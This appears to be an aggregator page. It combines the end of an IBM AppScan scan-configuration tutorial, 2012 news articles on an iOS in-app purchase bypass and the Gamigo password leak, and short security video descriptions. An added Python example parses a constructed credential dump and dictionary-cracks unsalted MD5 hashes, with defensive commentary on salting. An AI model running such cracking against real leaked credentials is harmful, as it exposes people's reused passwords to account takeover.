The scan configuration wizard is the core part of this tool. Using it, we let AppScan know what we expect from it. There are plenty of options available, with many choices among them.

URL and Servers

Starting URL: Under this feature, specify the starting URL of the scan. In most cases this would be the login page of the website. I have chosen Altoro Mutual, which is a demo site for testing web application vulnerabilities. If you want to limit the scan only to the links under this directory, select the check box.

Case Sensitive Path: If your server is case sensitive to URLs, then select this option. Case-sensitivity of a server depends upon the underlying operating system: Linux/UNIX is case-sensitive, whereas Windows is not.

Figure 3

Additional Servers and Domains: During the scan AppScan tries to crawl through all the links present in the site. When it discovers a link pointing to a different domain it will not attack that link unless the domain is specified under "Additional Servers and Domains". So by specifying a link under this tab, you are telling AppScan that it is OK to scan it even though it is not under the scan URL's domain. Click on the Next button to proceed.

Login Management: During the scan process, AppScan might accidentally hit a logout button, or a function that logs it out. So that it can log back in to the application, we specify the login process under this section.

Recorded: Upon selecting this option a new browser appears and tries to connect to the site specified as the start URL of this scan. You need to enter the credentials and log into the application. Once done, just close the browser. DO NOT click on the logout button, as that defeats the whole purpose of going through this process. Also notice that the browser opened is not IE or Firefox but the AppScan browser. You can change this browser option in AppScan under Tools -> Options -> Advanced: set the value of OpenIEBrowser to 0 for the AppScan browser, 1 for Internet Explorer, 2 for Firefox, 3 for Chrome. This is extremely useful in situations where the site behaves differently in each browser.

Figure 4

Prompt: AppScan prompts you to log into the application every time it logs out. Select this option only if you are planning to sit through the entire scan. If your application implements a CAPTCHA then this is one way to go ahead with the scan.

Automatic: Under this you can directly specify the user name and password to be used to log into the application.

Figure 5

Click on Next to continue.

Test Policy: Under test policy you need to select the policy that best suits your requirements. The available policies are Default, Application-only, Infrastructure-only, Invasive, Complete, The Vital Few, etc., of which the Default policy is the most used. If you do not want to send tests to the login and logout pages, you can select that option here.

Figure 6

Click on Next to continue.

Complete: This is the final step in starting the scan. IBM Rational AppScan lets you choose the way you want to start the scan, i.e. a full scan, an explore-only scan, etc.

Start a full automatic scan: With the configuration created earlier, AppScan explores and then proceeds to the test stage as described earlier in this article.

Start with automatic explore only: AppScan will only explore the application (i.e. crawl it) but does not send any attacks.

Start with manual explore: A browser will be opened, and you can manually browse through the application.

You can select the last option (i.e. "I will start scan later") when you would like to make more changes to the scan configuration.

We are almost ready to fly, but before we do there is something very important to deal with, which is the heart and soul of AppScan: the "Full Scan Configuration" window. Let's understand why it is so important for scanning any application.

Figure 7

Full Scan Configuration: For any successful communication it is very important that both parties are involved in the process and both acknowledge the requirements and expectations of each other. Only then can each meet the set goals. The same applies here. The more explicit you are when you specify your requirements, the better results you get. The full scan configuration window offers a way for AppScan to narrow down on your requirements. The options you have already selected are reflected here automatically (scan URL, test policy, etc.). As seen in the figure below, there are four main sections: Explore, Connection, Test, and General. Let us look at them in detail.

Explore: The following options are available under this:

URL and Servers: As explained above, details about the scan URL and additional servers come under this.

Login Management: In addition to the login method, you can specify whether you want AppScan to log in concurrently. This will decrease the total scan time. You can also specify regular expressions to detect the logout pages.

Figure 8

Environment Definition: Under this setting, you can specify the details of the operating system, web server, database server, and other third-party components, all of which can significantly improve the performance and accuracy of the scan.

Exclude Paths and Files: If you want to exclude a particular path in your site from the scan, or even exclude particular files, say .mp3 or .7z, you can specify them under this tab using a regular expression.

Explore Options: The redundant path option helps AppScan limit the number of times identical paths may be scanned. This is important because sometimes AppScan might enter an endless loop, hitting the same URLs again and again. With the redundant path option engaged, once the limit is reached, AppScan exits the loop. The main option in this section is the choice between depth-first and breadth-first. In breadth-first, AppScan explores all links on a page before proceeding to the next page. In depth-first, AppScan proceeds as it finds each new link.

Parameters and Cookies: Includes details about the parameters and the cookies present in the application.

Automatic Form Fill: During the scan, AppScan comes across forms which need some input. For instance, a registration page might need input values like username, address, etc. If you want AppScan to fill them for you automatically, select this option.

Error pages: Your input under this helps AppScan figure out the error pages.

Multi-Step Operations: There are certain parts of the application that are reached only when you request data in a certain order (for instance e-commerce sites). You can record their sequence here by clicking on the start recording button.

Glass box Scanning: Glass box scanning is a new feature introduced in AppScan wherein an agent is installed on the server to help the scanner find hidden URLs and additional issues.

Communication and Proxy: You can specify whether the scanner should use the IE proxy settings (or no proxy at all) under this.

HTTP Authentication: To use client-side certificates, upload the certificate file, the key file and the password under the "client-side certificate" section.

Test Policy: All the test names are listed under this option, and you can uncheck any of them if you do not want AppScan to scan for that particular vulnerability.

Test Options: Here AppScan presents you with the option of selecting adaptive testing. AppScan sends a lot of tests and usually takes a lot of time. By selecting adaptive testing, AppScan tries to determine the appropriate tests to send. For instance, it might detect that the underlying server is IIS and send only those test cases that IIS is vulnerable to; it would not check for issues related to other servers.

Privilege Escalation: You can upload scan files produced by scanning with a differently privileged user or an unauthenticated user.

Scan Expert: Scan Expert explores the application and presents you with recommendations for scanning the application better.

Click on OK and this will take you back to the initial scan wizard window. Select "Start a full automatic scan" and click on Finish. This completes the configuration and start of a scan in AppScan. In my next article we will explore more about analysing the scan results in AppScan.

References

InfoSec Resources
22. Hacker on Apple's iOS in-app purchase fix: 'Game is over'

By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 16:42 GMT (09:42 PDT)

Summary: Apple recently announced iOS 6 will block the hacking of its In-App Purchase program. The Russian hacker behind the attack has declared that Apple's fix will indeed block his circumvention technique. He's leaving his service open until iOS 6 is released, however, and pushing onwards with his Mac in-app hack.

Two weeks ago, Russian developer Alexey Borodin hacked Apple's In-App Purchase program for all devices running iOS 3.0 or later, allowing iPhone, iPad, and iPod touch users to circumvent the payment process and essentially steal in-app content. Apple confirmed the workaround and last week announced a temporary fix, and that it would patch the holes with the release of iOS 6. Borodin today declared that Apple's solution indeed stops his hack. Here's what he had to say, in a post on in-appstore.com titled "It's all over... for now.":

By examining last apple's statement about in-app purchases in iOS 6, I can say, that currently game is over. Currently we have no way to bypass updated APIs. It's a good news for everyone, we have updated security in iOS, developers have their air-money.

When Cupertino first tried to block the hack, it failed. Now the company finally has a proper solution, albeit a temporary one. We'll have to wait for iOS 6 to finally and completely block this hack. In the meantime, Borodin says the "service will still remain operational until iOS 6 comes out." Furthermore, he's still hard at work on the Mac in-app purchase hack he disclosed last week:

The another thing is for in-appstore for OS X. We still waiting for apple's reaction and we have some cards in the hand. It's good that OS X is open.

The worst part about the iOS hack was that developers had no way of protecting their apps. Using store receipts didn't work, as Borodin's service simply needed a single donated receipt, which it could then use to authenticate anyone's purchase requests.

His circumvention technique relied on installing certificates (for a fake in-app purchase server and a custom DNS server), changing DNS settings to allow the authentication of "purchases," and finally emulating the receipt verification server of the Apple App Store. Affected iOS apps treat Borodin's server as official communication because of how Apple authenticates a purchase. Until recently, there was nothing that tied the purchase directly to a customer or device, meaning a single purchased receipt could be used again and again. In short, this hack meant in-app purchase requests were being re-routed as well as approved. Now developers can thwart the approval process as they wait for iOS 6.

Still, Cupertino is transmitting its customers' Apple IDs and passwords in clear text (Apple assumed it would only ever be communicating with its own server). The following information is transferred from your device to Borodin's server: app restriction level, app id, version id, device guid, in-app purchase quantity, in-app purchase offer name, app identifier, app version, your language, and your locale. Whoever operates in-appstore.com could easily be gathering everyone's iTunes login credentials (as well as unique device-identifying data) in a classic man-in-the-middle attack. My guess is Apple will also address this part of the hack in iOS 6, a release which Borodin has approved.

http://www.zdnet.com/hacker-on-apples-ios-in-app-purchase-fix-game-is-over-7000001409/
  23. 8.24 million Gamigo passwords leaked after hack

By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 15:27 GMT (08:27 PDT)

Summary: Gamigo was hacked back in February but only in July are we seeing the results. More than 8.24 million e-mail addresses and passwords have been leaked after what looks like the biggest security breach of the year (so far).

Months after Gamigo warned its users of a server breach, 8,243,809 user account credentials (e-mail addresses and encrypted passwords) have made their way online. If you've never heard of it, Gamigo is a German online games publisher that focuses on Massively Multiplayer Online Role-Playing Games (MMORPGs) and has so far released 14 client games as well as five browser games. To check whether your account was one of the 8 million that have been compromised, head over to PwnedList, which tells me it just recently finished adding this release to its databases.

So, how did this all start? Sometime in late February 2012, Gamigo was hacked by someone who calls him or herself "8in4ry_Munch3r." The company's website was taken down for an extended period of "maintenance." On March 1, Gamigo sent out the following e-mail to its users:

Dear Community,

As you have all already noticed, our game servers, websites and forums are partially unreachable at the moment. We would like to explain to you what happened and what has been done on our side. There was an attack on the gamigo database in which user information, such as alias usernames and encrypted passwords, was stolen. An excerpt from these was published in the gamigo forums. We detected the attack and are working to the utmost of our resources to repair the damage and determine how it happened. Your character data, including items, is safely stored on the backup! We cannot rule out that the intruder(s) is/are still in possession of additional personal data, although to date we have received no report of any fraudulent use. To prevent any unauthorized access to your account, we have reset all passwords for the gamigo account system and for all gamigo games!

The gaming site also offered its users guidance on what to do in the aftermath of the hack. Please follow the following steps to recover access to your gamigo accounts and get back to playing again:

Step 1: Go to the gamigo Account System https://en.gamigo.com/showlayer/resetpassword and set up a new password for the gamigo Account System. Please make certain that the new password is not the same as the old one!

Step 2: Log in to the gamigo Account System with the new password and go to "My Games." Please select a new, secure password for each of your games.

Step 3: Important: Please also immediately change the passwords for all game forums you visit, to ensure that your data is safe there as well.

A detailed set of instructions on changing your password can be found in our guidelines at http://assets.cdn.gamigo.com/marketing/portal_en/password-help.pdf. If you have problems, please contact our Support team at https://ticket.gamigogames.de/index.php?languageid=1. We greatly regret this incident and any inconvenience it has caused to you.

Gamigo then returned to business as usual, and all was well. The hackers behind the attack, however, were far from done. They were hard at work compiling all the pilfered user accounts and passwords. On July 6, a forum topic on InsidePro titled "11? md5 hashlist to dump" was posted by a user "-=lebed=-":

Free large file hosting. Send big files the easy way! Please test your dictionaries OOPS!, the list should lead to a common mind, and that there is only a first hash, and then type E-mail: hash

That was at the beginning of July, but we're almost at the end. So, what took so long? Well, the leak was only spotted by PwnedList after they saw the following message from _Laz3r_ on July 16:

@gattaca Also http://gamigo.com got popped back in March, hashes dumped 7/6 on insidepro. About 8m email+hashes. InsidePro Software :: View topic - 11? md5 hashlist to dump

Here we are, a week later, and the breach is now fully public. This means we can take a closer look at what exactly was obtained by the hackers. The SendSpace link pointed to a 478MB file called "ALL.txt" with over 11 million account credentials. Some 6 percent were duplicates, but the rest were new. The link is dead now, but PwnedList managed to download and index it before it went down. The company gave me this quick analysis of the leak:

German accounts (.de): 2.4 million
t-online.de accounts: 100,000
US accounts (.com): 3 million
French accounts (.fr): 1.3 million

The e-mail addresses affect the usual big guys: Microsoft's Windows Live Hotmail, Google's Gmail, and Yahoo Mail. That being said, domains pointing to corporations such as Allianz, Deutsche Bank, ExxonMobil, IBM, and Siemens were also found among the list of compromised user credentials. The good news is that more than 5,000 e-mail addresses included the name Gamigo, suggesting that they were created specifically to register for the gaming site. Still, that number only represents 0.0006 percent of the total number of e-mail addresses and passwords that were leaked.

While the compromised accounts are unlikely to be useful on Gamigo's sites, since the gaming publisher forced a password reset for all its users, that doesn't mean they can't be used elsewhere. If you use the same e-mail address and password combination elsewhere, make sure to change it there as well.

This breach is bigger than anything we've seen so far this year. In the last few months, there have been a slew of attacks against the following sites: LinkedIn, eHarmony, Last.fm, Yahoo, Android Forums, Billabong, Formspring, and Nvidia, among others. The largest one was against LinkedIn, which saw the leak of 6.46 million passwords. Gamigo now tops the list. I have contacted Gamigo about this leak and will update you if I hear back.

http://www.zdnet.com/8-24-million-gamigo-passwords-leaked-after-hack-7000001403/
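The post describes two things a responder does with a dump like this: the triage PwnedList performed (deduplicating the "email:hash" lines, breaking addresses down by domain, spotting site-specific registrations) and the reason the dump was posted as an "md5 hashlist" for people to "test your dictionaries" against. The following added Python example (it is not PwnedList's, Gamigo's or InsidePro's code) does both on a constructed dump of a handful of lines with a constructed wordlist; the unsalted MD5 layout is assumed from the forum post's title, and nothing is read from the real leak.

```python
"""Triage of an "email:hash" credential dump of the kind described above.

Added example, not code from PwnedList, Gamigo or InsidePro. The dump lines,
the wordlist and the hash layout (unsalted MD5, as the forum post's title
advertises) are constructed here; nothing is read from the real leak.
"""
import hashlib
from collections import Counter


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed dump in the "email:hash" layout, with two exact duplicates and
# one malformed line to exercise the parser.
SAMPLE_DUMP = "\n".join([
    f"alice@example.de:{md5_hex('password')}",
    f"bob@t-online.de:{md5_hex('123456')}",
    f"carol@example.com:{md5_hex('letmein')}",
    f"dave@example.fr:{md5_hex('gamigo2012')}",
    f"gamigo.erin@example.com:{md5_hex('correct horse battery')}",
    f"alice@example.de:{md5_hex('password')}",   # duplicate
    f"bob@t-online.de:{md5_hex('123456')}",      # duplicate
    "garbage line without a separator",
])

# Constructed mini wordlist standing in for the dictionaries the post asks for.
WORDLIST = ["password", "123456", "qwerty", "letmein", "gamigo", "gamigo2012"]


def parse_dump(text):
    """Return (email -> hash, duplicate count), skipping malformed lines."""
    creds, dupes = {}, 0
    for line in text.splitlines():
        email, sep, h = line.strip().rpartition(":")
        if not sep or "@" not in email or len(h) != 32:
            continue
        email = email.lower()
        if email in creds:
            dupes += 1
        creds[email] = h.lower()
    return creds, dupes


def tld_breakdown(creds):
    """Count addresses per top-level domain (.de, .com, .fr, ...)."""
    return Counter(email.rsplit(".", 1)[-1] for email in creds)


def site_specific(creds, marker="gamigo"):
    """Addresses containing the site name, i.e. created just for this registration."""
    return sorted(e for e in creds if marker in e)


def crack_unsalted(creds, wordlist):
    """Unsalted hashes: hash each candidate once and it matches every account at once."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {email: lookup[h] for email, h in creds.items() if h in lookup}


def triage(text=SAMPLE_DUMP, wordlist=WORDLIST):
    """Full pass over a dump: dedupe, domain stats, site-specific accounts, cracking."""
    creds, dupes = parse_dump(text)
    cracked = crack_unsalted(creds, wordlist)
    return {
        "unique": len(creds),
        "duplicates": dupes,
        "tlds": dict(tld_breakdown(creds)),
        "site_specific": site_specific(creds),
        "cracked": cracked,
        "cracked_ratio": len(cracked) / len(creds),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The cracking step is the part worth noticing: because the hashes are unsalted, one MD5 computation per wordlist entry is compared against all 8 million accounts simultaneously, which is why a dump in this layout is handed to the cracking community as a single list. A per-user salt and a slow hash (bcrypt or scrypt, for instance) would force the same work to be repeated per account; the reused-password advice in the article applies either way.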
  24. Securitytube Python Scripting Expert Module 3-8: Programming With Scapy

Description: We have released the SecurityTube Python Scripting Expert course: SecurityTube Python Scripting Expert - SecurityTube Trainings. In this video, we learn how to use Scapy as a library in our Python scripts to charge them up with some ammunition. More example videos from the course are available here: http://www.securitytube.net/groups?operation=view&groupId=11. The SecurityTube Python Scripting Expert is now available for immediate subscription and download here: SecurityTube Python Scripting Expert - SecurityTube Trainings
  25. Description: In this video you will learn how to analyze a piece of malware (a botnet client) using the IDA Pro tool. The video presents a scenario-based case study covering the complete analysis process for the malware. This video is part of SecurityXploded. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: